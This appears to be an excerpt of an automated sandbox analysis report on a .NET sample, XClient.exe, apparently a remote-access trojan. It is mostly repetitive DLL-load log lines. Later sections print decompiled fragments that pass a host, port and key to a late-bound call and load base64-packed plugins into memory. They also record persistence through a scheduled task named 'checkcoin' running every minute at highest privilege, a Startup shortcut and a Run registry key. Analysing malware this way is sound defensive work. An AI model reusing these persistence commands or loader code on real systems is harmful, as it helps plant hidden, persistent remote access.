                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                  Source: checkcoin.lnk.0.drLNK file: ..\..\..\..\..\..\..\checkcoin
                  Source: XClient.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: XClient.exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  Source: XClient.exe.bin.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: XClient.exe.bin.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: XClient.exe.bin.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: checkcoin.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: checkcoin.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: checkcoin.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: XClient.exe.bin.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                  Source: XClient.exe.bin.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                  Source: XClient.exe.bin.exe, Messages.cs.Net Code: Memory
                  Source: checkcoin.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                  Source: checkcoin.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                  Source: checkcoin.0.dr, Messages.cs.Net Code: Memory
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, Messages.cs.Net Code: Memory
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeCode function: 0_2_00007FFB9AA4A45D push ebx; retn 000Ah0_2_00007FFB9AA4A4AA
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeFile created: C:\Users\user\checkcoinJump to dropped file
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeFile created: C:\Users\user\checkcoinJump to dropped file
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeFile created: C:\Users\user\checkcoinJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeFile created: C:\Users\user\checkcoinJump to dropped file
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "checkcoin" /tr "C:\Users\user\checkcoin"
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\checkcoin.lnkJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\checkcoin.lnkJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run checkcoinJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run checkcoinJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
